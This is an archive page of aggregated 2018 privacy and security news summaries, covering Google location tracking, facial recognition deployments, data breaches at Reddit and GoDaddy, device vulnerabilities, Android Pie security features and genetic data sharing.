Category Archives: Privacy

Google tracks users’ movements even if they have disabled the “Location History” on devices

According to the AP, many Google services on both Android and iPhone store records of user location even if the users have disabled the “Location History”.

According to a recent investigation conducted by the Associated Press, many Google services on both Android and iPhone devices store records of user location data, and the bad news is that they do it even if the users have disabled the “Location History” on devices.

When a user disables the “Location History” from the privacy settings of Google applications, he should prevent Google from stole location data.

Currently, the situation is quite different, experts from AP discovered that even when users have turned off the Location History, some Google apps automatically store “time-stamped location data” without explicit authorization.

“Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking. (It’s possible, although laborious, to delete it .)” reads the post published by AP.

“For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are,”

“And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude—accurate to the square foot—and save it to your Google account.”

The AP has used location data from an Android smartphone with ‘Location History’ disabled to desing a map of the movements of Princeton postdoctoral researcher Gunes Acar.

Location History


Data plotted on the map includes records of Dr. Acar’s train commute on two trips to New York and visits to the High Line park, Chelsea Market, Hell’s Kitchen, Central Park and Harlem other markers on the map, including Acar’s home address.

“The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.” continues the AP.

Google replied to the study conducted by the AP with the following statement:

“There are a number of different ways that Google may use location to improve people’s experience, including Location History, Web, and App Activity, and through device-level Location Services. We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time.” states Google.

Jonathan Mayer, a Princeton researcher and former chief technologist for the FCC’s enforcement bureau, remarked that location history data should be disabled when the users switch off’ the Location History,

“If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.”

The good news is it is possible to stop Google from collecting your location, it is sufficient to turn off the “Web and App Activity” setting, anyway, Google will continue to store location markers.

Open your web browser, go to, select “Activity Controls” and now turn off the “Web & App Activity” and “Location History. features”

For Android Devices:
Go to the “Security & location” setting, select “Privacy”, and tap “Location” and toggle it off.

For iOS Devices:
Google Maps users can access Settings → Privacy Location Services and change their location setting to ‘While Using’ the app.

Pierluigi Paganini

(Security Affairs – Location Data, Google)

The post Google tracks users’ movements even if they have disabled the “Location History” on devices appeared first on Security Affairs.

Identifying Programmers by their Coding Style

Fascinating research de-anonymizing code -- from either source code or compiled code:

Rachel Greenstadt, an associate professor of computer science at Drexel University, and Aylin Caliskan, Greenstadt's former PhD student and now an assistant professor at George Washington University, have found that code, like other forms of stylistic expression, are not anonymous. At the DefCon hacking conference Friday, the pair will present a number of studies they've conducted using machine learning techniques to de-anonymize the authors of code samples. Their work could be useful in a plagiarism dispute, for instance, but it also has privacy implications, especially for the thousands of developers who contribute open source code to the world.

Google Tracks Android, iPhone Users Even With ‘Location History’ Turned Off

Google tracks you everywhere, even if you explicitly tell it not to. Every time a service like Google Maps wants to use your location, Google asks your permission to allow access to your location if you want to use it for navigating, but a new investigation shows that the company does track you anyway. An investigation by Associated Press revealed that many Google services on Android and

Complaint Filed Against German Government Due To Hacking of Citizen Computers and Mobile Phones

German data protection group named Digital Courage has filed a complaint against the German Government in Constitutional Court. The government

Complaint Filed Against German Government Due To Hacking of Citizen Computers and Mobile Phones on Latest Hacking News.

Faces Are Being Scanned At US Airports With No Safeguards on Data Use

schwit1 writes: The program makes boarding an international flight a breeze: Passengers step up to the gate, get their photo taken and proceed onto the plane. There is no paper ticket or airline app. Thanks to facial recognition technology, their face becomes their boarding pass.... The problem confronting thousands of travelers, is that few companies participating in the program, called the Traveler Verification Service, give explicit guarantees that passengers' facial recognition data will be protected. And even though the program is run by the Department of Homeland Security, federal officials say they have placed no limits on how participating companies -- mostly airlines but also cruise lines -- can use that data or store it, opening up travelers' most personal information to potential misuse and abuse such as being sold or used to track passengers' whereabouts. The Department of Homeland Security is now using the data to track foreigners overstaying their visas, according to the Times. "After passengers' faces are scanned at the gate, the scan is sent to Customs and Border Protection and linked with other personally identifying data, such as date of birth and passport and flight information." But the face scans are collected by independent companies, and Border Protection officials insist they have no control over how that data gets used.

Read more of this story at Slashdot.

Crestron Touchscreens Could Spy On Hotel Rooms, Meetings

An anonymous reader quotes a report from Wired: The connected devices you think about the least are sometimes the most insecure. That's the takeaway from new research to be presented at the DefCon hacking conference Friday by Ricky Lawshae, an offensive security researcher at Trend Micro. Lawshae discovered over two dozen vulnerabilities in Crestron devices used by corporations, airports, sports stadiums, and local governments across the country. While Crestron has released a patch to fix the issues, some of the weaknesses allowed for hackers to theoretically turn the Crestron Android touch panels used in offices and hotel rooms into spy devices. Lawshae quickly noticed that these devices have security authentication protections disabled by default. For the most part, the Crestron devices Lawshae analyzed are designed to be installed and configured by third-party technicians, meaning an IT engineer needs to voluntarily turn on security protections. The people who actually use Crestron's devices after they're installed might not even know such protections exist, let alone how crucial they are. Crestron devices do have special engineering backdoor accounts which are password-protected. But the company ships its devices with the algorithm that is used to generate the passwords in the first place. That information can be used by non-privileged users to reverse engineer the password itself, a vulnerability simultaneously identified by both Lawshae and Jackson Thuraisamy, a vulnerability researcher at Security Compass. There were also over two dozen other vulnerabilities that could be exploited to do things like transform them into listening devices. In addition to being able to remotely record audio via the microphones to a downloadable file, Lawshae was also able to remotely stream video from the webcam and open a browser and display a webpage to an unsuspecting room full of meeting attendees. "Crestron has issued a fix for the vulnerabilities, and firmware updates are now available," reports Wired.

Read more of this story at Slashdot.

Sensitive data on 31,000 GoDaddy servers exposed online

By Waqas

All thanks to Unsecure AWS S3 Bucket. GoDaddy is the latest victim of cybercriminals and has joined the league of companies that got confidential data leaked due to unsecure Amazon S3 buckets. The world’s leading domain name registering platform, GoDaddy, boasts of more than 18m customers, which makes cyber-attack on this organization a high-profile feat. […]

This is a post from Read the original post: Sensitive data on 31,000 GoDaddy servers exposed online

New WhatsApp flaws let attackers hack private/group chats to fake news

By Waqas

Spreading fake news through WhatsApp was never so easy before. According to the latest research from Check Point security firm, WhatsApp users are at the risk of getting their private chats and group conversations hacked and exploited. Researchers discovered a new wave of attacks that allow cybercriminals to penetrate your messages on WhatsApp. This penetration […]

This is a post from Read the original post: New WhatsApp flaws let attackers hack private/group chats to fake news

Smashing Security #090: Fortnite for Android, and the FCC’s DDoS BS

Smashing Security #090: Fortnite for Android, and the FCC's DDoS BS

Fortnite players are told they’ll have to disable a security setting on Android, the FCC finally admits that it wasn’t hit by a DDoS attack, and Verizon’s VPN smallprint raises privacy concerns.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast hosted by computer security veterans Graham Cluley and Carole Theriault, joined this week by David Bisson.

Freelance Platform Upwork’s Opt-in Service Tracks Freelancers By Capturing Screenshots, Webcam Photos and Measuring Clicks and Keystrokes Frequency

Caroline O'Donovan, reporting for BuzzFeed News: To convince workers to join the unstable and unreliable world of freelance work, startups and platforms often promise freedom and flexibility. But on the digital freelance platform Upwork, company software tracks hundreds of freelancers while they work by saving screenshots, measuring the frequency of their clicks and keystrokes, and even sometimes taking webcam photos of the workers. Upwork, which hosts "millions" of coding and design gigs, guarantees payment for freelancers, even if the clients who hired them refuse to pay. But in order to get the money, freelancers have to agree in advance to use Upwork's digital Work Diary, which counts keystrokes to measure how "productive" they are and takes screenshots of their computer screens to determine whether they're actually doing the work they say they're doing. Upwork's tracker isn't automatically turned on for all gigs on the platform. Some freelancers like it because it guarantees payment, but others find it unnerving. [...] Upwork maintains that freelancers don't have to use the time tracker if it makes them uncomfortable. [...] But while Work Diary may be opt-in on its surface, Microsoft Research's Mary Gray said freelancers may not feel like they really have a choice.

Read more of this story at Slashdot.

New Facial Recognition Tool, Designed For Research Purposes, Tracks Targets Across Different Social Networks

Researchers at Trustwave on Wednesday released a new open-source tool called Social Mapper, which uses facial recognition to track subjects across social media networks. Designed for security researchers performing social engineering attacks, the system automatically locates profiles on Facebook, Instagram, Twitter, LinkedIn, and other networks based on a name and picture. Unlike tools such as Geofeedia that require access to certain APIs, Social Mapper performs automated manual searches in an instrumented browser window. The Verge: Those searches can already be performed manually, but the automated process means it can be performed far faster and for many people at once. "Performing intelligence gathering online is a time-consuming process," Trustwave explained in a post this morning. "What if it could be automated and done on a mass scale with hundreds or thousands of individuals?"

Read more of this story at Slashdot.

Hacker leaks Snapchat’s source code on Github

By Waqas

Pakistani Hacker Posted Authentic Snapchat Source Code on GitHub – Snapchat’s source code is stolen…can there be a bigger news than that? Perhaps there is! Not only that the source code has been stolen but also posted on Microsoft-owned GitHub of all the platforms. Reportedly, the hacker hails from a small village in Pakistan and uses the […]

This is a post from Read the original post: Hacker leaks Snapchat’s source code on Github

NEC Unveils Facial Recognition System For 2020 Tokyo Olympics

NEC, a Japanese IT and networking company, announced plans to provide a large-scale facial recognition system for the 2020 Summer Olympic and Paralympic Games in Tokyo. "The system will be used to identify over 300,000 people at the games, including athletes, volunteers, media, and other staff," reports The Verge. From the report: NEC's system is built around an AI engine called NeoFace, which is part of the company's overarching Bio-IDiom line of biometric authentication technology. The Tokyo 2020 implementation will involve linking photo data with an IC card to be carried by accredited people. NEC says that it has the world's leading face recognition tech based on benchmark tests from the US's National Institute of Standards and Technology. NEC demonstrated the technology in Tokyo today, showing how athletes and other staff wouldn't be able to enter venues if they were holding someone else's IC card. The company even brought out a six-foot-eight former Olympic volleyball player to demonstrate that the system would work with people of all heights, though he certainly had to stoop a bit. It worked smoothly with multiple people moving through it quickly; the screen displayed the IC card holder's photo almost immediately after.

Read more of this story at Slashdot.

Android Pie: Security and privacy changes

It is official: “Android P” is Android Pie, and it comes with a variety of new capabilities and security and privacy changes. The newest version (9.0) of the popular mobile OS introduces a new system navigation featuring a single home button, smart text selection, digital wellbeing controls, adaptive battery, a neural networks API, smart reply, and more. Security improvements Android 9 has the following security improvements: Built-in support for DNS over TLS, automatically upgrading DNS … More

The post Android Pie: Security and privacy changes appeared first on Help Net Security.

Pentagon Restricts Use of Fitness Trackers, Other Devices

Military troops and other defense personnel at sensitive bases or certain high-risk warzone areas won't be allowed to use fitness tracker or cellphone applications that can reveal their location, according to a new Pentagon order. From a report: The memo, obtained by The Associated Press, stops short of banning the fitness trackers or other electronic devices, which are often linked to cellphone applications or smart watches and can provide the users' GPS and exercise details to social media. It says the applications on personal or government-issued devices present a "significant risk" to military personnel so those capabilities must be turned off in certain operational areas. Under the new order, military leaders will be able to determine whether troops under their command can use the GPS function on their devices, based on the security threat in that area or on that base. "These geolocation capabilities can expose personal information, locations, routines, and numbers of DOD personnel, and potentially create unintended security consequences and increased risk to the joint force and mission," the memo said. Zack Whittaker, a security reporter at TechCrunch, said, DoD's statement today appears to be a response to the revelation that fitness tracker app Polar was exposing locations of spies and military personnel.

Read more of this story at Slashdot.

Avast Pulls the Latest Version of CCleaner Following Privacy Controversy

Piriform, the maker of CCleaner, has pulled v5.45 of its suite from the website after users expressed concerns over the privacy changes in the application, the company, which was acquired by Avast last year, said. In v5.45, the company made it impossible to disable "active monitoring", and the privacy settings had been removed for free customers. Additionally, as BetaNews reported earlier this week, Avast also made it impossible for users to quit the software. Addressing these concerns, Avast said, "Today we have removed v5.45 and reverted to v5.44 as the main download for CCleaner while we work on a new version with several key improvements." The company added: We're currently working on separating out cleaning functionality from analytics reporting and offering more user control options which will be remembered when CCleaner is closed. We're also creating a factsheet to share which will outline the data we collect, for which purposes and how it is processed. [...] As stated before, we'll split cleaning alerts (which don't send any data) from UI trend data (which is anonymous and only there to measure the user experience) and provide a separate setting for each in the user preferences. Some of these features run as a separate process from the UI: we'll restore visibility of this in the notifications area, and you'll be able to close it down from that icon menu as before. We understand the importance of this to you all. This work is our number 1 priority and we are taking the time to get it right in the next release. There are numerous changes required, so that does mean it will take weeks, not days. While we work on this, we have removed version 5.45 and reinstated version 5.44. According to stats shared by the company, CCleaner has been downloaded over two billion times. In a week, it is estimated to see five million downloads.

Read more of this story at Slashdot.

Cybercrime gangs continue to go where the money is

According to the APWG’s new Phishing Activity Trends Report, phishing in the first part of 2018 surged 46 percent higher than late 2017. The total number of phish detected in the first quarter of 2018 was 263,538. That was up from the 180,577 observed in the fourth quarter of 2017. It was also significantly greater than the 190,942 seen in the third quarter of 2017. The phishing attacks of early 2018 targeted users of online … More

The post Cybercrime gangs continue to go where the money is appeared first on Help Net Security.

Smashing Security #089: Data breaches, ransomware, Bitcoin robberies, and typewriters

Smashing Security #089: Data breaches, ransomware, Bitcoin robberies, and typewriters

Ransomware rears its head again, Dixons Carphone reveals its data breach was almost 1000% worse than they previously thought, a man is accused of stealing five million dollars worth of cryptocurrency through hijacking mobile phones, and a Canadian guy called Norman is rushing to get the typewriters out of storage.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by journalist Geoff White.

Top Genetic Testing Firms Promise Not To Share Data Without Consent

Ancestry, 23andMe and several other top genetic testing companies pledged on Tuesday not to share users' DNA data with others without consent. "Under the new guidelines, the companies said they would obtain consumers "separate express consent" before turning over their individual genetic information to businesses and other third parties, including insurers," reports The Washington Post. "They also said they would disclose the number of law-enforcement requests they receive each year." From the report: The new commitments come roughly three months after local investigators used a DNA-comparison service to track down a man police believed to be the Golden State Killer, who allegedly raped and killed dozens of women in California in the 1970s and 1980s. Investigators identified the suspect using a decades-old DNA sample obtained from the crime scene, which they uploaded to GEDmatch, a crowdsourced database of roughly a million distinct DNA sets shared by volunteers. Investigators said they did not need a court order before using GEDmatch, sparking fresh fears that users' biological data might be too easy to access -- and could end up in the wrong hands -- without additional regulation on the fast-growing, already popular industry.

Read more of this story at Slashdot.

Reddit hacked: Hackers steal complete copy of old database backup

By Waqas

Reddit says the breach took place after hackers intercepted SMS that were supposed to be delivered to employees. The social media giant Reddit has announced that it has suffered a data breach in which attackers hacked into its system and ended up stealing data of its registered users including emails and encrypted passwords. Reddit discovered the […]

This is a post from Read the original post: Reddit hacked: Hackers steal complete copy of old database backup

A Hacker Broke Into a Few of Reddit’s Systems and Managed To Access Some User Data, Company Says

A hacker broke into a few of Reddit's systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords, Reddit said Wednesday. From the announcement: Since then we've been conducting a painstaking investigation to figure out just what was accessed, and to improve our systems and processes to prevent this from happening again. Reddit says the incident occurred between June 14 and June 18 when the hacker "compromised a few of our employees' accounts with our cloud and source code hosting providers." Interestingly, even as Reddit employees maintain 2FA on their accounts, the attacker managed to get access to their data. "We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept," the company said. The company says it has a reason to believe the attacker had access to the following data: All Reddit data from 2007 and before including account credentials and email addresses. What was accessed: A complete copy of an old database backup containing very early Reddit user data -- from the site's launch in 2005 through May 2007. In Reddit's first years it had many fewer features, so the most significant data contained in this backup are account credentials (username + salted hashed passwords), email addresses, and all content (mostly public, but also private messages) from way back then. How to tell if your information was included: We are sending a message to affected users and resetting passwords on accounts where the credentials might still be valid. If you signed up for Reddit after 2007, you're clear here.

Read more of this story at Slashdot.

Achieving compliance: GDPR, CCPA and beyond

AB 375, or the California Consumer Privacy Act (CCPA) of 2018, was signed into law by California Governor, Jerry Brownon, on June 28, 2018 and is recognized as one of the toughest privacy laws in the U.S. The statute requires companies to disclose to California residents what information is being collected on them and how it will be used. Companies have 18-months to prepare for this new law to go into effect; it’s set to … More

The post Achieving compliance: GDPR, CCPA and beyond appeared first on Help Net Security.

Concert Ticket Retailer AXS Collects Personally Identifiable Data Through Its App, Which is Mandatory To Download, and Sells It To 3rd Party Without Anonymizing

AXS, a digital marketplace operated by Anschutz Entertainment Group (AEG), is the second largest presenter of live events in the world after Live Nation Entertainment (i.e. Ticketmaster). Paris Martineau of The Outline reports that the company forces customers to download a predatory app which goes on to snatch up a range of personally identifiable data and sells it to a range of companies, including Facebook and Google, without ever anonymizing or aggregating them. From the report: The company requires users to download an app to use any ticket for a concert, game, or show bought through AXS, and it doesn't come cheap. AXS uses a system called Flash Seats, which relies on a dynamically generated barcode system (read: screenshotting doesn't work) to fight off ticket scalping and reselling. [...] Here's a brief overview of all of the information that can be collected from just the mobile app alone, nearly all of which is shared with third parties without being anonymized or aggregated: first and last name, precise location (as determined by GPS, WiFi, and other means), how often the app is used, what content is viewed using the app, which ads are clicked, what purchases are made (and not made), a user's personal advertising identifier, IP address, operating system, device make and model, billing address, credit card number, security code, mailing address, phone number, and email address, among many others. [...] AXS also shares the personal data collected on its customers with event promoters and other clients, none of whom are bound even by this (extremely lax) privacy policy.

Read more of this story at Slashdot.

Naked Security – Sophos: NSA hasn’t closed security windows Snowden climbed through

One of three problems found in an audit: two-person access controls haven't been properly implemented at data centers and equipment rooms.

Naked Security - Sophos

NSA hasn’t closed security windows Snowden climbed through

One of three problems found in an audit: two-person access controls haven't been properly implemented at data centers and equipment rooms.

How rogue data puts organisations at risk of GDPR noncompliance

The GDPR compliance deadline came in by force on 25th May 2018 and applies to all organisations processing and holding the personal information of data subjects. This includes contacts such as customers, partners and patients. Much has been written about the immense efforts of organisations to improve their data privacy procedures in order to comply with GDPR, but there is a largely undiscussed oversight lurking just under the surface which, if left unaddressed, still leaves … More

The post How rogue data puts organisations at risk of GDPR noncompliance appeared first on Help Net Security.

Infosecurity.US: Bye-Bye, DNA – Hello GSK (and others)

via The Outline's author, Paris Martineau, comes this tale of opt-in/opt-out, GlaxoSmithKline 23andMe. and of course, The Goods - , your DNA. Of which, results in a nagging question: Why would I (or you for that matter), agree to hand over my uniquely identifying DNA data to a commercial enterprise (that only answers to it's shareholders, and only has it's best interests in mind) to use as they see fit? Oh, and a couple of other questions: Do you trust a big-pharma corporation with your own personal Map of Life? What about the future use of that data, once it's in the slipstream of artificially intelligent genetic-testing-reliant health insurance companies? Food for Thought or just Paranoia? You be the judge; after all, it's your DNA, right?

"In short, most — if not all — of the information 23andMe has on its users has probably been shared with someone that isn’t 23andMe itself, and money might have even changed hands. Which is all perfectly within the company’s rights to do, since they agreed to it (probably blindly) when they signed up." - via The Outline author Paris Martineau in the well crafted post 'How To Sign Away The Rights To Your DNA'


Flaw in Swann smart security cameras allows access to user’s live stream

By Waqas

Security cameras and other IoT devices have been frequently identified to be incompetent and plagued with a variety of built-in flaws that render them vulnerable to exploitation by hackers. The same has been proven yet again by a team of security researchers from Pen Test Partners. Researchers Andrew Tierney, Chris Wade, and Ken Munro participated […]

This is a post from Read the original post: Flaw in Swann smart security cameras allows access to user’s live stream

Canadian Malls Are Using Facial Recognition To Track Shoppers’ Age, Gender Without Consent

At least two malls in Calgary are using facial recognition technology to track shoppers' ages and genders without first obtaining their consent. "A visitor to Chinook Center in south Calgary spotted a browser window that had seemingly accidentally been left open on one of the mall's directories, exposing facial-recognition software that was running in the background of the digital map," reports "They took a photo and posted it to the social networking site Reddit on Tuesday." From the report: The mall's parent company, Cadillac Fairview, said the software, which they began using in June, counts people who use the directory and predicts their approximate age and gender, but does not record or store any photos or video from the directory cameras. Cadillac Fairview said the software is also used at Market Mall in northwest Calgary, and other malls nationwide. Cadillac Fairview said currently the only data they collect is the number of shoppers and their approximate age and gender, but most facial recognition software can be easily adapted to collect additional data points, according to privacy advocates. Under Alberta's Personal Information Privacy Act, people need to be notified their private information is being collected, but as the mall isn't actually saving the recordings, what they're doing is legal. It's not known how many other Calgary-area malls are using the same or similar software and if they are recording the data.

Read more of this story at Slashdot.

New Android P includes several security improvements

According to the Android developer Program Overview, the next major version of Android, Android 9.0 or P, is set to arrive soon. Their plans show a final release within the next three months (Q3 2018).

The end of the Android P beta program is approaching, with the first release candidate built and released in July. As a security company, we simply can’t help but take a close look at what kind of security updates will be included in Android’s newest version.

We are not going to write about new features of Android P, but instead will focus our attention on security improvements. Android P introduces a number of updates that enhance the security of your apps and the devices that run them.

Improved fingerprint authentication

For our own safety, most devices (and many apps) have an authentication mechanism. The new Android P OS provides improved biometrics-based authentication. In Android 8.1, there were two new metrics that helped its biometric system repel attacks: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). Along with a new model that splits biometric security into weak and strong, biometric authentication becomes more reliable and trustworthy in Android P.

Android P also promises to deliver a standardized look, feel, and placement for the dialog that requests a fingerprint. This increases user’s confidence that they are interacting with a trusted source. App developers can trigger the new system fingerprint dialog using a new BiometricPrompt API, and it’s recommended to switch over to the new system dialog as soon as possible. The platform itself selects an appropriate biometric to authenticate with; thus developers don’t need to implement this logic by themselves.

Biometric authentication mechanisms are becoming increasingly popular and they have a lot of potential, but only if designed securely, measured accurately, and implemented correctly.

Signature Scheme v3

Android P pushes support for APK Signature Scheme v3. The major difference from v2 is key rotation support. Key rotation will be useful for developers, as this scheme has ApkSignerLineage included. As the review committee states:

“The signer lineage contains a history of signing certificates with each ancestor attesting to the validity of its descendant. Each additional descendant represents a new identity that can sign an APK. In this way, the lineage contains a proof of rotation by which the APK containing it can demonstrate, to other parties, its ability to be trusted with its current signing certificate, as though it were signed by one of its older ones. Each signing certificate also maintains flags which describe how the APK itself would like to trust the old certificates, if at all, when encountered.”

This gives you an opportunity to sign with a new certificate easily. You simply link the APK files to the ones with which they are now signed.

Although Scheme v3 turns on by default, note that you can still use an old signing certificate.

HTTP Secure (HTTPS) by default

Nowadays, many apps are still transmitting users’ information unencrypted, making personal data vulnerable to hackers. People bothered by potential for breach or invasion of privacy can feel more secure knowing their transmissions in Android P will be secure by default.

In Android P, third-party developers will have to enable HTTPS (It was optional in Android 8.0) for their apps. However, they can still ignore the advice and specify certain domains that will deliver unencrypted traffic.

Protected confirmation

A protected confirmation API exists in all devices launched with Android P. Using this API, apps can use the ConfirmationPrompt class to display confirmation prompts to the user, asking them to approve a short statement. This statement allows the app to confirm that the user would like to complete a sensitive transaction, such as making a bill payment.

Right after the statement acceptance, your app receives a cryptographic signature, protected by a keyed-hash message authentication code (HMAC). The signature is produced by the trusted execution environment (TEE). This protects the display of the confirmation dialog, as well as user input. The signature indicates, with high confidence, that the user has seen the statement and has agreed to it.

Hardware security module

Here’s an additional update that benefits everyone: Devices with Android P will be supporting a StrongBox Keymaster. The module contains its own CPU, secure storage, and a true random number generator. It also protects against package tampering and unauthorized sideloading of apps.

In order to support StrongBox implementations, Android P uses subset of algorithms and key sizes, such as:

  • RSA 2048
  • AES 128 and 256
  • ECDSA P-256
  • HMAC-SHA256 (supports key sizes between 8 bytes and 64 bytes, inclusive)
  • Triple DES 168

Peripherals background policy

With Android P, apps will not be able to access your smartphone’s microphone, camera, or sensors. Users get a notification when apps attempt to access these in the background. On attempting, the microphone will report empty audio, cameras will disconnect (causing an error if the app tries to use them), and all sensors will stop reporting events.

Backup data encryption update

It’s not a secret that Android backs up data from your device. Users can then restore data after signing into their Google account from another device. Starting with Android P, it’ll start using a client-side secret method for its encryption. This means encryption will be done locally on the device, whereas before, a backup of your device was encrypted directly on the server.

Because of this new privacy measure, users will need the device’s PIN, pattern, or password to restore data from the backups made by their device.

Wrapping things up

All these improvements mean only one thing: It’ll be significantly harder for criminals to access your data when they shouldn’t be able to. With the massive amounts of breaches over the last two years, this should come as a relief for consumers, who simply want to use their phones without fear of privacy being compromised.

The post New Android P includes several security improvements appeared first on Malwarebytes Labs.

The Trump Administration is Talking To Facebook and Google About Potential Rules For Online Privacy

The Trump administration is crafting a proposal to protect Web users' privacy, aiming to blunt global criticism that the absence of strict federal rules in the United States has enabled data mishaps at Facebook and others in Silicon Valley. From a report: Over the past month, the Commerce Department has been huddling with representatives of tech giants such as Facebook and Google, Internet providers including AT&T and Comcast, and consumer advocates [Editor's note: the link may be paywalled; alternative source], according to four people familiar with the matter but not authorized to speak on the record. The government's goal is to release an initial set of ideas this fall that outlines Web users' rights, including general principles for how companies should collect and handle consumers' private information, the people said. The forthcoming blueprint could then become the basis for Congress to write the country's first wide-ranging online-privacy law, an idea the White House recently has said it could endorse. "Through the White House National Economic Council, the Trump Administration aims to craft a consumer privacy protection policy that is the appropriate balance between privacy and prosperity," Lindsay Walters, the president's deputy press secretary, said in a statement. "We look forward to working with Congress on a legislative solution consistent with our overarching policy."

Read more of this story at Slashdot.

Identity theft protection firm LifeLock may have exposed user email addresses

By Waqas

LifeLock, an Arizona-based identity theft protection firm may have exposed email addresses of millions of its customers – Simply put: A firm vowing to protect online identity of its customers may have exposed their identity to malicious hackers and cybercriminals. It happened due to a critical vulnerability which exposed LifeLock’s customers to phishing and identity […]

This is a post from Read the original post: Identity theft protection firm LifeLock may have exposed user email addresses

OCR Issues Guidance on Disclosures to Family, Friends and Others

In its most recent cybersecurity newsletter, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) provided guidance regarding identifying vulnerabilities and mitigating the associated risks of software used to process electronic protected health information (“ePHI”). The guidance, along with additional resources identified by OCR, are outlined below:

  • Identifying software vulnerabilities. Every HIPAA-covered entity is required to perform a risk analysis that identifies risks and vulnerabilities to the confidentiality, integrity and availability of ePHI. Such entities must also implement measures to mitigate risks identified during the risk analysis. In its guidance, OCR indicated that mitigation activities could include installing available patches (where reasonable and appropriate) or, where patches are unavailable (such as in the case of obsolete or unsupported software), reasonable compensating controls, such as restricting network access.
  • Patching software. Patches may be applied to software and firmware on a wide range of devices, and the installation of vendor patches is typically routine. The installation of such updates, however, may result in unexpected events due to the interconnected nature of computer programs and systems. OCR recommends that organizations install patches for identified vulnerabilities in accordance with their security management processes. In order to help ensure the protection of ePHI during patching, OCR also identifies common steps in patch management as including evaluation, patch testing, approval, deployment, verification and testing.

In addition to the information contained in the guidance, OCR identified a number of additional resources, which are listed below:

Police Are Seeking More Digital Evidence From Tech Companies

U.S. law enforcement agencies are increasingly asking technology companies for access to digital evidence on mobile phones and apps, with about 80 percent of the requests granted, a new study found. From a report: The report released Wednesday by the Center for Strategic and International Studies found local, state and federal law enforcement made more than 130,000 requests last year for digital evidence from six top technology companies -- Alphabet's Google, Facebook, Microsoft, Twitter, Verizon' media unit Oath and Apple. If results from telecom and cable providers Verizon, AT&T, and Comcast are added in, the number jumps to more than 660,000. The requests covered everything from the content of communications to location data and names of particular users. "The number of law enforcement requests, at least as directed at the major U.S.-based tech and telecom companies, has significantly increased over time," the Washington-based think tank found. "Yet, the response rates have been remarkably consistent."

Read more of this story at Slashdot.

Breaking the Ice on DICE: scaling secure Internet of Things Identities

In this Spotlight Podcast, sponsored by Trusted Computing Group*, Dennis Mattoon of Microsoft Research gives us the low-down on DICE: the Device Identifier Composition Engine Architectures, which provides a means of  solving a range of security and identity problems on low cost, low power IoT endpoints. Among them: establishing strong device...

Read the whole entry... »

Related Stories

Amazon’s Facial Recognition Wrongly Identifies 28 Lawmakers, ACLU Says

Representative John Lewis of Georgia and Representative Bobby L. Rush of Illinois are both Democrats, members of the Congressional Black Caucus and civil rights leaders. But facial recognition technology made by Amazon, which is being used by some police departments and other organizations, incorrectly matched the lawmakers with people who had been arrested for a crime, the American Civil Liberties Union reported on Thursday morning. From a report: The errors emerged as part of a larger test in which the civil liberties group used Amazon's facial software to compare the photos of all federal lawmakers against a database of 25,000 publicly available mug shots. In the test, the Amazon technology incorrectly matched 28 members of Congress with people who had been arrested, amounting to a 5 percent error rate among legislators. The test disproportionally misidentified African-American and Latino members of Congress as the people in mug shots. "This test confirms that facial recognition is flawed, biased and dangerous," said Jacob Snow, a technology and civil liberties lawyer with the A.C.L.U. of Northern California. Nina Lindsey, an Amazon Web Services spokeswoman, said in a statement that the company's customers had used its facial recognition technology for various beneficial purposes, including preventing human trafficking and reuniting missing children with their families. She added that the A.C.L.U. had used the company's face-matching technology, called Amazon Rekognition, differently during its test than the company recommended for law enforcement customers.

Read more of this story at Slashdot.

Do we trust privacy technology too much?

The Internet has become absolutely vital to maintaining relationships in the modern world. As well as our social network of friends from across the globe, we also rely on a collection of apps and online services to stay in touch with our loved ones who we see every day.

This has some interesting implications on what we say online. We are very careful to regulate what we say, depending on the potential audience. We are unlikely to share our deepest secrets publicly on our Facebook timeline where anyone can see them for instance. But we may use a private Facebook Messenger chat session to discuss deeply personal issues with a trusted friend.

The illusion of privacy

Some apps – like Facebook Messenger and Snapchat – claim to offer enhanced privacy protections. Snapchat promise that messages sent using the app are automatically deleted in 10 seconds.

As a result, users are tempted to share more sensitive information than they would using a standard messaging app. But there is a problem.

Take Snapchat for example. Photos and messages really are deleted after 10 seconds – from the recipient’s phone. But that doesn’t mean that the picture is gone forever. By taking a screenshot, or using another app, the recipient can keep a copy of the picture – and you have no control at all over what they do with it.

The app may feel private, and the app developer may promise that your data is secure, but nothing can completely protect your privacy. This is the “illusion of privacy” and it can cause serious problems when you take these promises at face value.

Hiding and seeking online

Security experts call this desire for privacy online “hiding”. Many apps contain features specifically designed to help us hide – and all too often they overpromise on how protected we really are. Because for every “hiding” app, there is another designed for “seeking”, helping to circumvent those safeguards and uncover the information we want to keep hidden.

Often it is the human factor that is the greatest threat to our privacy. The hiding technology works in principle, but it does not take into account what other people do, or their actions to expose us.

This is a serious problem because our trust in privacy technology can be used against us. If the system is secure and we trust it, we are more likely to share extremely sensitive information using it. When this trust is broken by a seeking app used by an untrustworthy contact, the fall-out can be incredibly severe.

Taking a default position of mistrust

In order to better protect our privacy, we must each take greater responsibility for what we share online. Tech companies know that people are concerned about their privacy, and they make many bold statements about how they will protect us.

But the truth is none of these safeguards is foolproof. It may be that if you want to share an unpopular opinion or some personal photographs, social media apps and services are not the tools to use.

To learn more about protecting your privacy, download a free trial of Panda Dome today.

Download Panda FREE VPN

The post Do we trust privacy technology too much? appeared first on Panda Security Mediacenter.

Popular Android/iOS Apps & Extensions Collecting “Highly Personal” User data

By Waqas

